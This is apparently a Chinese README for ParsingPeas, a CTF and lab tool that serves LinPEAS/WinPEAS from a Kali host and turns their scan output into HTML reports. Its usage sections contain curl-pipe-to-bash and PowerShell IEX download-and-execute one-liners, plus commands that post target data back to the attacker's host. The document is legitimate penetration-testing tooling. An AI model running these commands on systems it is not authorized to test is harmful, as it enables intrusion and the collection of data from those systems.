自动化收集 PEASS + 生成干净、可移植的 HTML 报告,适用于 CTF 和实验室权限提升工作。
在目标上运行 一条命令。ParsingPeas 从您的 Kali 主机拉取 LinPEAS/WinPEAS,运行扫描,将输出传回,并将其转换为单个自包含 HTML 报告——您可以阅读、搜索、分类和保存——无需手动传输文件,目标无需互联网。
报告摘要 — 按 LinPEAS 自身类别分组的章节,带有标记点和一个发现条:

仅显示发现 — 点击一次即可将报告和侧边栏过滤到包含关键/高风险的章节:

完整终端输出 — 完整、忠实保留颜色的扫描结果;可使用 Ctrl-F 搜索:

原始的 PEASS 输出是一面滚动的终端文本墙,一旦 shell 关闭就会消失。ParsingPeas:
scp,无需自行托管 linpeas,无需将输出复制粘贴回 Kali。.html 文件,可以复制到其他地方、存档或通过双击离线打开。它是 呈现 + 后勤,不是利用引擎:它忠实地保留了 PEASS 自身的颜色和发现,而不是二次猜测它们。
file:// 打开。N 个关键 / N 个高风险 标签,可跳转到标记的章节,外加颜色图例。bash)和 WinPEAS(PowerShell)。git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # 下载 LinPEAS + WinPEAS 到 scripts/
pip3 install -r requirements.txt
python3 receiver.py # 在 http://0.0.0.0:8005 上提供服务
保持 receiver.py 运行。找到目标可以访问您的 IP:
tun0 地址 — ip -4 addr show tun0Linux/Unix(使用 curl,失败时回退到 wget):
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash
Windows(PowerShell / 反向 shell):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"
选择与目标操作系统对应的一行命令 — Linux 提供 LinPEAS,Windows 提供 WinPEAS。
报告在您的 Kali 主机上生成于 ./reports/ 目录中。您可以:
http://YOUR_KALI_IP:8005 上的索引并点击一个报告,或者xdg-open ./reports/report_<host>_<timestamp>.html
将该单个 .html 文件复制到任何地方;它独立工作。
目标 → 从 Kali 下载包装器 → 运行 PEASS → POST 输出 → Kali 解析 → 自包含 HTML 报告
目标永远不需要互联网 — 包装器和 PEASS 二进制文件都从您的主机提供。
如果一行命令失败,可以手动操作。
Linux:
# 在目标上
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# 发回
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
Windows(PowerShell):
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
解析您已有的 PEASS 输出:
python3 parser.py /path/to/peas_output.txt # 将 HTML 报告写入 ./reports/
编辑 receiver.py 的顶部:
curl http://KALI_IP:8005/health 检查连接;使用 sudo ufw allow 8005/tcp 开放防火墙。/get-linpeas 返回 404? 运行 ./setup.sh 以获取 PEAS 二进制文件。⚠️ 仅用于授权渗透测试、CTF 和实验室环境。
基于 PEASS-ng 构建,原作者 @carlospolop。ParsingPeas 仅收集并呈现其输出。
MIT 许可证 · 欢迎贡献
| 设置项 | 默认值 | 备注 |
|---|
| 端口 | 8005 | 修改 app.run(... port=...) 行 |
OUTPUT_DIR | ./received_outputs | 原始上传的扫描文件 |
REPORTS_DIR | ./reports | 生成的 HTML 报告 |
SCRIPTS_DIR | ./scripts | LinPEAS/WinPEAS 二进制文件 |
MAX_UPLOAD_SIZE | 10 MB | 强制执行 — 大于此的上传会收到 HTTP 413 |